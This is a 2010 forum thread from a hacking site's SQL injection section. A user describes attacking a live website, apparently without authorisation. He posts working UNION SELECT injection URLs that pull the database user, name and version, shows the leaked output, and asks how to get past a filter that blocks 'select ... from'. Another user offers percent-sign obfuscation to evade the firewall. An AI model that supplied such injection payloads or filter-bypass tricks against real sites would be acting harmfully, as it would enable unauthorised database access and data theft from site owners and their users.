 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
SELECT + FROM Filtered!! |
 |
 Posted: Mon Dec 13, 2010 7:27 pm |
 |
|
| TheMoorish |
| Active user |
 |
|
| Joined: Dec 05, 2010 |
| Posts: 26 |
|
|
|
 |
|
 |
|
Hi waraxers!!
I have this website which i was training on it as long as other websites, the filter is pretty tough!
i can't bypass it with known methodes like /*!*/ or uNiOn SelEcT or UnIOn (Select 1 from)
At first everything seems cool!!
| Code: | | http://www.site.com/page.php?rubr=news&id=-232 union select 1,2,3,4,5,6,CONCAT_WS(CHAR(32,58,32),user(),databa se(),version()),8,9,10,11,12,13,14,15,16,17,18,19-- |
siteuser@localhost : sitedb : 4.0.24_Debian-10sarge3-log
Untill i add "from", the forbidden page pops up!!!
| Code: | | http://www.site.com/page.php?rubr=news&id=-232 union select 1,2,3,4,5,6,7,8,9,8,9,10,11,12,13,14,15,16,17,18,1 9 from mysql.user-- |
Its only forbidden when you add "select + from"
i mean that "from" is not filtered alone.
same thing when you add "union + from" it doesn't give you the forbidden page.
So the server only filters "select + from"
I'll be so gratefull if you can help me with it . Thanks! |
|
Last edited by TheMoorish on Tue Dec 14, 2010 6:06 am; edited 1 time in total |
|
|
|
|
|
|
|
| Posted: Mon Dec 13, 2010 10:22 pm |
|
|
| Despotic |
| Active user |
 |
|
| Joined: Nov 17, 2010 |
| Posts: 42 |
|
|
|
|
|
|
|
I hated those sites at first but found a pretty easy way of overcoming it.
Instead of select+from ... try.. se%lect+fr%om
and since from is not filtered you may want to try..... se%lect+from
I found out that will bypass most firewalls and filters....
and will still execute. Let me know if it works for you.
this is the first time that I have told anyone about that. |
|
|
|
|
|
|
|
|
| Posted: Mon Dec 13, 2010 11:05 pm |
|
|
| TheMoorish |
| Active user |
|
|
| Joined: Dec 05, 2010 |
| Posts: 26 |
|
|
|
|
|
|
|
| Despotic wrote: | I hated those sites at first but found a pretty easy way of overcoming it.
Instead of select+from ... try.. se%lect+fr%om
and since from is not filtered you may want to try..... se%lect+from
I found out that will bypass most firewalls and filters....
and will still execute. Let me know if it works for you.
this is the first time that I have told anyone about that. |
Hi Despotic ,Thank you for your reply...I have tried "%" and it is filtered too, aslo when i add it alone i get the forbidden page.
| Code: | | http://www.site.com/page.php?rubr=news&id=-232% |
|
|
|
|
|
| Posted: Wed Dec 15, 2010 5:58 am |
|
|
| TheMoorish |
| Active user |
|
|
| Joined: Dec 05, 2010 |
| Posts: 26 |
|
|
|
|
|
|
|
| its a tough filter indeed XD |
|
Last edited by TheMoorish on Wed Dec 15, 2010 5:48 pm; edited 1 time in total |
|
|
|
| Posted: Wed Dec 15, 2010 3:28 pm |
|
|
| x3roconf_ |
| Advanced user |
|
|
| Joined: May 01, 2008 |
| Posts: 101 |
|
|
|
|
|
|
|
It's not allowed to post uncensored target urls. Just FYI.  |
|
|
|
|
| Posted: Wed Dec 15, 2010 5:50 pm |
|
|
| TheMoorish |
| Active user |
|
|
| Joined: Dec 05, 2010 |
| Posts: 26 |
|
|
|
|
|
|
|
| x3roconf_ wrote: | | It's not allowed to post uncensored target urls. Just FYI. |
link removed , thanks! XD |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 66
Members: 0
Total: 66
